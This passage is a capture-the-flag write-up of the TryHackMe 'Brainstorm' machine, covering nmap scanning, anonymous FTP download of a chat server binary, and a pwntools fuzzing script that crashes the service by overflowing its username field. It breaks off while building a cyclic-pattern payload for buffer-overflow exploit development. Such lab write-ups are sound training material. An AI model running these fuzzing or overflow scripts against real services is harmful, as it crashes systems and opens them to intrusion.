u915

Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Brainstorm

Writeup about the Tryhackme machine Brainstorm

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Starting with nmap. This time I wasted time improving my nmap scans because were really noisy and slow.

The scan is divided in 2 parts. First a quick scan in all ports only searching open ports and dumping the data to a grep format ports.txt

nmap -p- --open -T5 -v 10.10πŸ˜„ -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:00 CEST
Initiating Connect Scan at 20:00
Scanning 10.10πŸ˜„ [65535 ports]
Discovered open port 3389/tcp on 10.10πŸ˜„
Discovered open port 21/tcp on 10.10πŸ˜„
Discovered open port 9999/tcp on 10.10πŸ˜„
Connect Scan Timing: About 19.35% done; ETC: 20:03 (0:02:09 remaining)
Connect Scan Timing: About 64.45% done; ETC: 20:02 (0:00:34 remaining)
Completed Connect Scan at 20:02, 88.02s elapsed (65535 total ports)
Nmap scan report for 10.10πŸ˜„
Host is up (0.037s latency).
Not shown: 65532 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
3389/tcp open  ms-wbt-server
9999/tcp open  abyss

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 88.15 seconds

To extract the data I use grep -oP (Perl regex format) and tr to replace string xargs to output the data in one line:

cat ports.txt | grep -oP '\d{2,5}/open' |  tr '/open' ' '| xargs | tr ' ' ','
21,3389,9999

Combined with a more deep scan:

nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' |  tr '/open' ' '| xargs | tr ' ' ',')  10.10πŸ˜„ -oN full_scan2.txt                                                                                                  1 β¨―
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:45 CEST
Nmap scan report for 10.10πŸ˜„
Host is up (0.037s latency).

PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|_  SYST: Windows_NT
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2021-07-02T17:09:32
|_Not valid after:  2022-01-01T17:09:32
|_ssl-date: 2021-07-03T18:47:40+00:00; -37s from scanner time.
9999/tcp open  abyss?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     Welcome to Brainstorm chat (beta)
|     Please enter your username (max 20 characters): Write a message:
|   NULL: 
|     Welcome to Brainstorm chat (beta)
|_    Please enter your username (max 20 characters):
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.91%I=7%D=7/3%Time=60E0B03B%P=x86_64-pc-linux-gnu%r(NUL
SF:L,52,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\
SF:x20your\x20username\x20\(max\x2020\x20characters\):\x20")%r(GetRequest,
SF:63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x2
SF:0your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x20mess
SF:age:\x20")%r(HTTPOptions,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(b
SF:eta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20characters
SF:\):\x20Write\x20a\x20message:\x20")%r(FourOhFourRequest,63,"Welcome\x20
SF:to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20userna
SF:me\x20\(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(Ja
SF:vaRMI,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20en
SF:ter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x
SF:20message:\x20")%r(GenericLines,63,"Welcome\x20to\x20Brainstorm\x20chat
SF:\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20cha
SF:racters\):\x20Write\x20a\x20message:\x20")%r(RTSPRequest,63,"Welcome\x2
SF:0to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20usern
SF:ame\x20\(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(R
SF:PCCheck,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20
SF:enter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a
SF:\x20message:\x20")%r(DNSVersionBindReqTCP,63,"Welcome\x20to\x20Brainsto
SF:rm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2
SF:020\x20characters\):\x20Write\x20a\x20message:\x20")%r(DNSStatusRequest
SF:TCP,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20ente
SF:r\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x20
SF:message:\x20")%r(Help,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta
SF:\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20characters\):
SF:\x20Write\x20a\x20message:\x20")%r(SSLSessionReq,63,"Welcome\x20to\x20B
SF:rainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\
SF:(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(TerminalS
SF:erverCookie,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease
SF:\x20enter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\
SF:x20a\x20message:\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -37s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.20 seconds

We can see 2 intereting things, first, there is a FTP server witn anonymous login and a strange port 9999 running, a chat ?

Anyway I downloaded the files inside the FTP with the anonymous login

ftp 10.10πŸ˜„                                                                                                                                                                                                                    127 β¨―
Connected to 10.10πŸ˜„.
220 Microsoft FTP Service
Name (10.10πŸ˜„:u915): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19  08:36PM       <DIR>          chatserver
226 Transfer complete.
ftp> cd chatserver
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19  10:26PM                43747 chatserver.exe
08-29-19  10:27PM                30761 essfunc.dll
226 Transfer complete.

Downloading the files

ftp> get chatserver.exe
local: chatserver.exe remote: chatserver.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
43747 bytes received in 0.35 secs (122.8856 kB/s)
ftp> get essfunc.dll
local: essfunc.dll remote: essfunc.dll
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 32 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
30761 bytes received in 0.15 secs (194.3710 kB/s)

Note: I did this wrong, because I realized that I downloaded the files in text mode (ASCII mode) and not in binary mode… I came back to this after getting stuck for a while because I could not run the .exe file

Before downloading the files set the file type to binary:

ftp> bin
200 Type set to I.

At this point is clear that maybe we got the same executables running on the port 9999, so we can debug and study the executables to try to exploit the chat service.

Lets interact with the chat service

nc 10.10πŸ˜„ 9999                                                         
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): u915
Write a message: ok


Sat Jul 03 12:02:11 2021
u915 said: ok

Looks like we can use 2 “strings” to test if it is vulnerable, the username and the message.

Note: Warning, for some reason the question (How many ports are open?) the valid answer is not 3. I “bruteforce” the answer and the valid answer is 6, don’t tell me why, because I tested a lot of scans and I always get the same open ports.

2 - Vulnerability Identification

Studying in detail the .exe file and dll obtained from the FTP server on another Windows machine.

I used the same windows 7 tryhackme machine for the stack buffer overflow preparation.

alt text

xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea

I did a custom python script to buff the username, after a bit of tunning the script looks like this:

#!/bin/python3

from pwn import *

HOST = "10.10πŸ˜„"
PORT = "9999"
LIMIT = 60
CHARS_FUZZ = 500

for x in range (1,LIMIT):
	r = remote(HOST,PORT)
	print(r.recvline(timeout=1))
	print(r.recvline(timeout=1))
	print("[+] SENDING USERNAME"+str(CHARS_FUZZ*x)+" CHARS, COUNTER:"+str(x))
	r.send("A"*CHARS_FUZZ*x+"\r\n")
	r.clean()
	print("[+] SENDING CHAT")
	r.send("Ok\r\n")
	print(r.recvline(timeout=1))
	print(r.recvline(timeout=1))
	print(r.recvline(timeout=1))
	if (r.recvline(timeout=4))==b'':
		print("[!] KO CHAT")
		r.close()
		break
	r.clean()
	r.close()

Started to buzz in chunks of 500 chars:

python3 fuzz1.py
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME500 CHARS, COUNTER:1
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:07 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME1000 CHARS, COUNTER:2
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:09 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME1500 CHARS, COUNTER:3
[+] SENDING CHAT
b'Write a message: \n'
b'\n'
b'Sat Jul 03 16:13:10 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME2000 CHARS, COUNTER:4
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:11 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME2500 CHARS, COUNTER:5
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:13 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME3000 CHARS, COUNTER:6
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:14 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME3500 CHARS, COUNTER:7
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:15 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME4000 CHARS, COUNTER:8
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:17 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME4500 CHARS, COUNTER:9
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:18 2021\n'
[*] Closed connection to 10.10πŸ˜„ port 9999
[+] Opening connection to 10.10πŸ˜„ on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME5000 CHARS, COUNTER:10
[+] SENDING CHAT
b''
b''
b''
[!] KO CHAT
[*] Closed connection to 10.10πŸ˜„ port 9999

The server crashes beetwen 4500 and 5000 chars

alt text

So the server is vulnerable to a bufferoverflow attack. At leats we can shutdown the service 😎

3 - Exploit development

Started creating a pattern of 5000 chars:

msf-pattern_create -l 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk

Using the pattern with another version of the previous python script to trigger the bufferoverflow, this time with Inmunity debugger atached to study the .exe executable:

#!/bin/python3

from pwn import *

HOST = "10.10πŸ˜„"
PORT = "9999"
LIMIT = 60
CHARS_FUZZ = 500
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7